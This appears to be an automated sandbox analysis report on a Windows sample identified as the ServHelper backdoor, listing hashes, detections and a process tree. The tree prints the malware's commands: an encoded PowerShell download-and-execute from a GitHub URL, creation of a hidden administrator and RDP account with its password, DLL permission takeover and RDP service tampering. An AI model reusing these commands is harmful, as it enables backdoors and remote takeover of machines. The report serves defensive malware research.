Analysis
-
max time kernel
124s -
max time network
109s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
09-08-2021 04:21
Static task
static1
Behavioral task
behavioral1
Sample
86178014e457120d9dc6f6e27453338c.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
86178014e457120d9dc6f6e27453338c.exe
Resource
win10v20210408
General
-
Target
86178014e457120d9dc6f6e27453338c.exe
-
Size
6.0MB
-
MD5
86178014e457120d9dc6f6e27453338c
-
SHA1
16ab38c0e9c4516532f9d111523e948a6311bfc0
-
SHA256
d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
-
SHA512
746417e600a1a0cb157f6a74422140b1ed75767a7f47f208c46feadac1dcf845637ce986a11cd7ed3f07e9782ff736b8da448057b0eb65cc50df30baa500bf75
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 956 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1980 icacls.exe 544 icacls.exe 1220 takeown.exe 2024 icacls.exe 1716 icacls.exe 924 icacls.exe 788 icacls.exe 932 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 288 288 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 544 icacls.exe 1220 takeown.exe 2024 icacls.exe 1716 icacls.exe 924 icacls.exe 788 icacls.exe 932 icacls.exe 1980 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c261f65c-c5c5-4ee5-8917-969188840c02 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SI4PKHXK8YLXXEWKMU4Q.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ac43274-53cf-491d-a291-6fa27120fe4c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2b25da9f-166d-4992-81ce-f6008985f3df powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80a98c12-462f-4523-a4ff-4fd85ac77c55 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3b8840d3-d0ba-40c1-9f14-83e71b26a432 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99079d4f-656b-4ea6-a271-7f41dd686224 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e2dc9e65-295b-4a25-9b24-30de871d1037 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_466c1ed4-16fc-42f0-a5cf-9ce89880283a powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_515d8fe1-b2f0-42ea-9770-eb3a85b9c8b4 powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80795e16-a1e7-4269-9c5f-d237f43eef3a powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e411422f-c750-4950-8d1e-f80cc9365c29 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 4073488dd58cd701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Processes:
86178014e457120d9dc6f6e27453338c.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 86178014e457120d9dc6f6e27453338c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 86178014e457120d9dc6f6e27453338c.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1472 powershell.exe 1472 powershell.exe 924 powershell.exe 924 powershell.exe 1308 powershell.exe 1308 powershell.exe 1208 powershell.exe 1208 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 956 powershell.exe 956 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 464 288 288 288 288 -
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
86178014e457120d9dc6f6e27453338c.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1084 86178014e457120d9dc6f6e27453338c.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 924 powershell.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 1208 powershell.exe Token: SeRestorePrivilege 1716 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1728 WMIC.exe Token: SeIncreaseQuotaPrivilege 1728 WMIC.exe Token: SeAuditPrivilege 1728 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1728 WMIC.exe Token: SeIncreaseQuotaPrivilege 1728 WMIC.exe Token: SeAuditPrivilege 1728 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 892 WMIC.exe Token: SeIncreaseQuotaPrivilege 892 WMIC.exe Token: SeAuditPrivilege 892 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 892 WMIC.exe Token: SeIncreaseQuotaPrivilege 892 WMIC.exe Token: SeAuditPrivilege 892 WMIC.exe Token: SeDebugPrivilege 956 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
86178014e457120d9dc6f6e27453338c.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 1084 wrote to memory of 1472 1084 86178014e457120d9dc6f6e27453338c.exe powershell.exe PID 1084 wrote to memory of 1472 1084 86178014e457120d9dc6f6e27453338c.exe powershell.exe PID 1084 wrote to memory of 1472 1084 86178014e457120d9dc6f6e27453338c.exe powershell.exe PID 1472 wrote to memory of 1752 1472 powershell.exe csc.exe PID 1472 wrote to memory of 1752 1472 powershell.exe csc.exe PID 1472 wrote to memory of 1752 1472 powershell.exe csc.exe PID 1752 wrote to memory of 1348 1752 csc.exe cvtres.exe PID 1752 wrote to memory of 1348 1752 csc.exe cvtres.exe PID 1752 wrote to memory of 1348 1752 csc.exe cvtres.exe PID 1472 wrote to memory of 924 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 924 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 924 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1308 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1308 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1308 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1208 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1208 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1208 1472 powershell.exe powershell.exe PID 1472 wrote to memory of 1220 1472 powershell.exe takeown.exe PID 1472 wrote to memory of 1220 1472 powershell.exe takeown.exe PID 1472 wrote to memory of 1220 1472 powershell.exe takeown.exe PID 1472 wrote to memory of 2024 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 2024 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 2024 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 1716 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 1716 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 1716 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 924 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 924 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 924 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 788 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 788 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 788 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 932 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 932 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 932 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 1980 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 1980 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 1980 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 544 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 544 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 544 1472 powershell.exe icacls.exe PID 1472 wrote to memory of 1360 1472 powershell.exe reg.exe PID 1472 wrote to memory of 1360 1472 powershell.exe reg.exe PID 1472 wrote to memory of 1360 1472 powershell.exe reg.exe PID 1472 wrote to memory of 284 1472 powershell.exe reg.exe PID 1472 wrote to memory of 284 1472 powershell.exe reg.exe PID 1472 wrote to memory of 284 1472 powershell.exe reg.exe PID 1472 wrote to memory of 1276 1472 powershell.exe reg.exe PID 1472 wrote to memory of 1276 1472 powershell.exe reg.exe PID 1472 wrote to memory of 1276 1472 powershell.exe reg.exe PID 1472 wrote to memory of 1424 1472 powershell.exe net.exe PID 1472 wrote to memory of 1424 1472 powershell.exe net.exe PID 1472 wrote to memory of 1424 1472 powershell.exe net.exe PID 1424 wrote to memory of 892 1424 net.exe net1.exe PID 1424 wrote to memory of 892 1424 net.exe net1.exe PID 1424 wrote to memory of 892 1424 net.exe net1.exe PID 1472 wrote to memory of 1612 1472 powershell.exe cmd.exe PID 1472 wrote to memory of 1612 1472 powershell.exe cmd.exe PID 1472 wrote to memory of 1612 1472 powershell.exe cmd.exe PID 1612 wrote to memory of 1192 1612 cmd.exe cmd.exe PID 1612 wrote to memory of 1192 1612 cmd.exe cmd.exe PID 1612 wrote to memory of 1192 1612 cmd.exe cmd.exe PID 1192 wrote to memory of 1716 1192 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"C:\Users\Admin\AppData\Local\Temp\86178014e457120d9dc6f6e27453338c.exe"1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwos05d0\jwos05d0.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FB1.tmp" "c:\Users\Admin\AppData\Local\Temp\jwos05d0\CSC22ABBD0B181D470C8ADE18864EE5B39D.TMP"4⤵PID:1348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1220 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2024 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:924 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:788 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:932 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1980 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:544 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1360
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:284 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1276
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:892
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1848
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1752
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1844
-
C:\Windows\system32\net.exenet start TermService5⤵PID:932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1540
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2272
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2284
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1220
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:2024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:824
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc x2ZZlQ39 /add1⤵PID:1716
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc x2ZZlQ39 /add2⤵PID:1984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc x2ZZlQ39 /add3⤵PID:892
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:968
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:824
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:956
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:1192
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1336
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1612
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc x2ZZlQ391⤵PID:1716
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc x2ZZlQ392⤵PID:788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc x2ZZlQ393⤵PID:1984
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1308
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1192
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:892
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1212
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1224db42-7593-4e0a-a9dd-53a802380c51
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5bfa02a4-56c4-4b0d-8731-ecaa84524853
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fb426de-7576-4a4f-a8f2-82c2b3d65330
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_702a450b-524d-476d-a0bb-2f4bf5d8a799
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7404c170-8fc4-4442-b115-3d8f33044de2
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_89b8b062-b6b0-4fb3-99a9-046a41c0f506
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bf82d09d-0553-4157-bcee-c1e6bccab36d
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
